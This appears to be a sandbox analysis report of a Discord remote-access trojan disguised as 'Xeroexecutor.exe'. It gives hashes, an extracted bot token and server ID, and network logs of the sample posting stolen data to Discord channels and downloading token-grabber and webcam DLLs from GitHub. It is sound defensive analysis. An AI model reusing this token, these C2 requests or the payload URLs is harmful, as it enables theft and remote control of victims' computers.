Analysis

  • max time kernel
    125s
  • max time network
    126s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags
    arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    09/05/2024, 14:23 UTC

General

  • Target

    Xeroexecutor.exe

  • Size

    78KB

  • MD5

    a4b35f10a18f1c4360b00f828abbc2b5

  • SHA1

    78c9ba86d8b3ca966b66ddb182c08268c79858a6

  • SHA256

    b4ca7c2c6efafb1d7402096885dcae56f6fb3d845b758ed3c1cfef21792e1444

  • SHA512

    47703141997cae647f52f692a62b38bc7543f739b5334f387f8753716cadb488898abeda21732b13c7153e0bcbc76a44c9d821f899c3b137892587538296bb3b

  • SSDEEP

    1536:52WjO8XeEXFh5P7v88wbjNrfxCXhRoKV6+V+KPIC:5Zv5PDwbjNrmAE+WIC

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY

  • server_id

    1237709600602722354

Signatures

  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Downloads MZ/PE file
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and other sensitive profile data.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Xeroexecutor.exe
    "C:\Users\Admin\AppData\Local\Temp\Xeroexecutor.exe"
    1
    • Suspicious use of AdjustPrivilegeToken
    PID:2676

Network

  • US
    DNS
    gateway.discord.gg
    Xeroexecutor.exe
    Remote address:
    8.8.8.8:53
    Request
    gateway.discord.gg
    IN A
    Response
    gateway.discord.gg
    IN A
    162.159.135.234
    gateway.discord.gg
    IN A
    162.159.133.234
    gateway.discord.gg
    IN A
    162.159.130.234
    gateway.discord.gg
    IN A
    162.159.136.234
    gateway.discord.gg
    IN A
    162.159.134.234
  • US
    GET
    https://gateway.discord.gg/?v=9&encording=json
    Xeroexecutor.exe
    Remote address:
    162.159.135.234:443
    Request
    GET /?v=9&encording=json HTTP/1.1
    Connection: Upgrade,Keep-Alive
    Upgrade: websocket
    Sec-WebSocket-Key: 26iAYpXxRTASShXuIDK1Ig==
    Sec-WebSocket-Version: 13
    Host: gateway.discord.gg
    Response
    HTTP/1.1 101 Switching Protocols
    Date: Thu, 09 May 2024 14:23:34 GMT
    Connection: upgrade
    sec-websocket-accept: xvw7DTNjAc820iBnkI2DQMdFcAQ=
    upgrade: websocket
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNERUNV4VWnm0NklWCs0C%2BlWctksfZgkcnYz2Kr8ai6nIHEo4CiC5jW6S1rH1jT5QE%2Bg4xOIyBTJHbuIBcomwbS7JtaT1PqQjvqI70zaJT3o50kvAu4fxwlP4rOXTBDtoCJxEA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    X-Content-Type-Options: nosniff
    Server: cloudflare
    CF-RAY: 8812591f6d4460dd-LHR
  • US
    DNS
    discord.com
    Xeroexecutor.exe
    Remote address:
    8.8.8.8:53
    Request
    discord.com
    IN A
    Response
    discord.com
    IN A
    162.159.136.232
    discord.com
    IN A
    162.159.137.232
    discord.com
    IN A
    162.159.135.232
    discord.com
    IN A
    162.159.138.232
    discord.com
    IN A
    162.159.128.233
  • US
    POST
    https://discord.com/api/v9/guilds/1237709600602722354/channels
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/guilds/1237709600602722354/channels HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 29
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 201 Created
    Date: Thu, 09 May 2024 14:23:36 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=b9274f580e0f11efa46a7a13f4bcce61; Expires=Tue, 08-May-2029 14:23:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: be56019ae011689ff5baf218062aacf5
    x-ratelimit-limit: 2000
    x-ratelimit-remaining: 1999
    x-ratelimit-reset: 1715351016.418
    x-ratelimit-reset-after: 86400.000
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K%2F0H9GkPG7sZjznhax8JHbW6pJ72LhTI7unnyaDpkuJ0WH7a4NOC6WUOU3jptLViuDCjLHG2rbHIyZx5mc7vmQEeigIvK84iH%2FM4qDjERL%2BXzARWMRYn%2BhioM1c2"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=b9274f580e0f11efa46a7a13f4bcce615a4b103059f82c89957e4d041c301ced9ffe6c9540ce712e90bb1456cc39b7f3; Expires=Tue, 08-May-2029 14:23:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=db113242c805bd68379ae757c1d2a7326a199ad8-1715264616; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=x86uKguZnLGbKrcpwAH8x9QMLXs3Tm_4neGZTg9lw_E-1715264616588-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 8812592bdca57324-LHR
  • US
    DNS
    234.135.159.162.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    234.135.159.162.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    geolocation-db.com
    Xeroexecutor.exe
    Remote address:
    8.8.8.8:53
    Request
    geolocation-db.com
    IN A
    Response
    geolocation-db.com
    IN A
    159.89.102.253
  • DE
    GET
    https://geolocation-db.com/json
    Xeroexecutor.exe
    Remote address:
    159.89.102.253:443
    Request
    GET /json HTTP/1.1
    Host: geolocation-db.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx/1.14.0 (Ubuntu)
    Date: Thu, 09 May 2024 14:23:36 GMT
    Content-Type: text/html
    Content-Length: 194
    Location: https://geolocation-db.com/json/
    Connection: keep-alive
  • DE
    GET
    https://geolocation-db.com/json/
    Xeroexecutor.exe
    Remote address:
    159.89.102.253:443
    Request
    GET /json/ HTTP/1.1
    Host: geolocation-db.com
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Thu, 09 May 2024 14:23:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Access-Control-Allow-Origin: *
  • US
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 116
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:23:37 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=b9b7ce340e0f11efb257dadefbae2c79; Expires=Tue, 08-May-2029 14:23:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1715264618.361
    x-ratelimit-reset-after: 1.000
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXAORW3WOUuIhRTr952VRUOQ07sWTOjYUOXsMclguNQwxj%2BYlnGS6lo%2BLApNeMgkBM0yHAZLn29eSDqZhWfjkYmFN7Re%2FRZJpsMsn%2BMknSChVMgJrkV3kGnj2Gal"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=b9b7ce340e0f11efb257dadefbae2c79d456d5a29d6e8a7e54f42fc3a484543b10e3c8096b4fc673cf3ea53082b42237; Expires=Tue, 08-May-2029 14:23:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=c3b3aa51e84a0bce716afb777fac4983703e1d6d-1715264617; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=QQo4n5cBgvbVnTOsv3D8uysehUQ1oePMyuQRKc1cFEk-1715264617536-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 88125931cdd276cc-LHR
  • US
    DNS
    232.136.159.162.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.136.159.162.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    253.102.89.159.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    253.102.89.159.in-addr.arpa
    IN PTR
    Response
  • US
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: multipart/form-data; boundary="0b7af09f-1a4b-473f-8fee-8a83f669034f"
    Host: discord.com
    Content-Length: 429690
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:23:49 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=c107038a0e0f11efba074a1ad3516406; Expires=Tue, 08-May-2029 14:23:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1715264630.216
    x-ratelimit-reset-after: 1.000
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TyYc5VkzTsbhb9%2FdVZbBQrV6ZL0Q61UeXiSsmq2MAuEtSrG2OoVhVOyjGILnuu9xRvlSN1g7rAJYz4qJ%2FIu3jR3JYZslDWdJK4LYaQlU3HWe43GdICL1EXtG0vnj"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=c107038a0e0f11efba074a1ad351640653ccf9503c86a9a31b8920d67b48c40cc30853fe42bae314dddafc93311fdeb8; Expires=Tue, 08-May-2029 14:23:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=4d2d09abd90ca0308dbeac8f4c7934388a76aded-1715264629; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=NhHutmer7BF2rF3rPM1QEhsMaFETW4khjoyEn3bv5LU-1715264629800-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 88125979c834941b-LHR
  • US
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 31
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:23:50 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=c13bc9120e0f11efa5cd7ef7caddeb3d; Expires=Tue, 08-May-2029 14:23:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 3
    x-ratelimit-reset: 1715264631.221
    x-ratelimit-reset-after: 1.175
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2FlY15EmmpCTtkAfjZ08xu8JBudQ4HwOHL3GbWm%2FR0zLF60GEraeXlyZq22NIpYs6%2BQMbDViGfSoqRTFnYvQYYjdyIZlnTOBmSZUYFzETHqeHJZW9Kxeif25dCG4"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=c13bc9120e0f11efa5cd7ef7caddeb3db108e21db7ccbf144bb2f3824b4a9082d25bfc3d56ddc7922c57ec6f3d3cc63f; Expires=Tue, 08-May-2029 14:23:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=f6cfec3732f0bed84bd169e004f9f2931489d36a-1715264630; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=EU8qKb_d503I2bIYIJdoQwb_9QiZmjlT8z0hfx8uz8k-1715264630146-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 881259810d17949c-LHR
  • US
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: multipart/form-data; boundary="9c70f21a-37b0-4f9d-a736-294f6de117c8"
    Host: discord.com
    Content-Length: 3557
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:24:03 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=c9291fee0e0f11ef87867ee3850b10bd; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1715264644.031
    x-ratelimit-reset-after: 1.000
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iI7Zkamq078CQMvt6hNUdHZ%2F5xRX0buDZIocaVQsrPB0DUlt7IsgWOLSWkDi3gv07kJi4DXUpbfxnn3KNZtemdHb0ywnzicamcc6ew9RpKZGheBNKOAOWlT%2FePU7"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=c9291fee0e0f11ef87867ee3850b10bd6eaca715e2631d527c05eba598e51446694bf93584aaba494cd060d32632f86f; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=df9f07d9999f1566681e241643ca11fb25020dba-1715264643; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=kp9yikD.9AYczCKuJwmPGejBrw3hBQVPx0UVH4eMz34-1715264643444-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 881259d1bdaa24b7-LHR
  • US
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 31
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:24:03 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=c95eed9a0e0f11ef8a96ee0fdedbfaae; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 3
    x-ratelimit-reset: 1715264645.025
    x-ratelimit-reset-after: 1.329
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCsvN0eqnwTCJaL1OdCL%2BqjaPjVUJgpcbCpYtyfGpC8pM4L9wbGoatS80zuj0Md9DNJIwJgE5gS2GDeyvSxkqMupLwxtAnL15%2BbIipbzhKp1RfRaCKS7Leo0gvos"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=c95eed9a0e0f11ef8a96ee0fdedbfaae4cba57d10d1d3d3844b4c3cae959069cc3daa742ab76399ec891938ffaa5a278; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=df9f07d9999f1566681e241643ca11fb25020dba-1715264643; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=CQscJ9x_5JYZd0RB6OnAZ8Q1AOZDkPd1P6K_ZvZQZg8-1715264643815-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 881259d649867198-LHR
  • US
    DNS
    raw.githubusercontent.com
    Xeroexecutor.exe
    Remote address:
    8.8.8.8:53
    Request
    raw.githubusercontent.com
    IN A
    Response
    raw.githubusercontent.com
    IN A
    185.199.109.133
    raw.githubusercontent.com
    IN A
    185.199.111.133
    raw.githubusercontent.com
    IN A
    185.199.108.133
    raw.githubusercontent.com
    IN A
    185.199.110.133
  • US
    GET
    https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll
    Xeroexecutor.exe
    Remote address:
    185.199.109.133:443
    Request
    GET /moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll HTTP/1.1
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 2901504
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: application/octet-stream
    ETag: "7aa094c7a5e7645371637e2935e65a95ac7ec8899b4f08b38009a9f1887128d9"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: 520A:17E061:3B5A3F:48EFFD:663CDCA6
    Accept-Ranges: bytes
    Date: Thu, 09 May 2024 14:24:39 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lcy-eglc8600085-LCY
    X-Cache: MISS
    X-Cache-Hits: 0
    X-Timer: S1715264679.998598,VS0,VE199
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 538f4d5eff5fb505522334cff6a94d1eacf807e9
    Expires: Thu, 09 May 2024 14:29:39 GMT
    Source-Age: 0
  • US
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 20
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:24:40 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=df0afe720e0f11efb08556f99f94da73; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1715264681.039
    x-ratelimit-reset-after: 1.000
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lsb8%2Bn1SuAGTkjVowoOxZUylyCfidozjUPeP00CyWftmp4qo6IELWnv3MsquYyWaFQfCUXzjkyfcFvMTBfxw8ZKSVydMZyenb8I70v%2FoKhalU4N%2BCVQkbqG8Vr7q"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=df0afe720e0f11efb08556f99f94da7330d953b55fa52cc76d030e691d48b209c471300f16eef5692765464f2041e819; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=9fed67a20803f8a2d12c0145ac82f6fdd218f820-1715264680; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=7QIfCTAc5akM358jxHdiJsw2fON.ylycnpSku4SM51Q-1715264680162-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 88125ab939179503-LHR
  • US
    DNS
    133.109.199.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.109.199.185.in-addr.arpa
    IN PTR
    Response
    133.109.199.185.in-addr.arpa
    IN PTR
    cdn-185-199-109-133githubcom
  • US
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 31
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:24:40 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=df3f10ae0e0f11ef8953a27d37c5972a; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 3
    x-ratelimit-reset: 1715264682.039
    x-ratelimit-reset-after: 1.630
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sanHyNzJwbZDqLJKKi5cV4xBSNAPYQ2p8ZcCX5D4g3W69q7WSmnU%2F4x%2FEMcohuQ8CRbktFIq%2Fks3eFhJmhB4cE3iXmgjGehiImt%2Bkr3KiSgCE%2FIK9WNWgwhfB6Og"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=df3f10ae0e0f11ef8953a27d37c5972a1e8724111627e64e20fe8ec32ee64f6aeb9861ede0d2d28478b6e9369b085f06; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=9fed67a20803f8a2d12c0145ac82f6fdd218f820-1715264680; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=6IfMpQHY4tG9KbUqXiMqNRrfoBEVKM8ap_LuFxwTFeE-1715264680514-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 88125abbca3a79c6-LHR
  • US
    DNS
    13.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.227.111.52.in-addr.arpa
    IN PTR
    Response
  • US
    GET
    https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll
    Xeroexecutor.exe
    Remote address:
    185.199.109.133:443
    Request
    GET /moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll HTTP/1.1
    Host: raw.githubusercontent.com
    Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 39936
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: application/octet-stream
    ETag: "f50f41ce6d31d22a2bffcc57235e46a4d7a05fb38896fd150333f34701eb4b56"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: 515C:1CC8B4:2ED44A:397B90:663CDCBE
    Accept-Ranges: bytes
    Date: Thu, 09 May 2024 14:25:10 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lcy-eglc8600096-LCY
    X-Cache: MISS
    X-Cache-Hits: 0
    X-Timer: S1715264711.545413,VS0,VE157
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 13e5eacf71b2ed7f841b43abb8b0846c6807e6c7
    Expires: Thu, 09 May 2024 14:30:10 GMT
    Source-Age: 0
  • US
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 31
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:25:11 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=f181d76a0e0f11efb6b79ac70ff69aa5; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1715264712.004
    x-ratelimit-reset-after: 1.000
    vary: Accept-Encoding
    via: 1.1 google
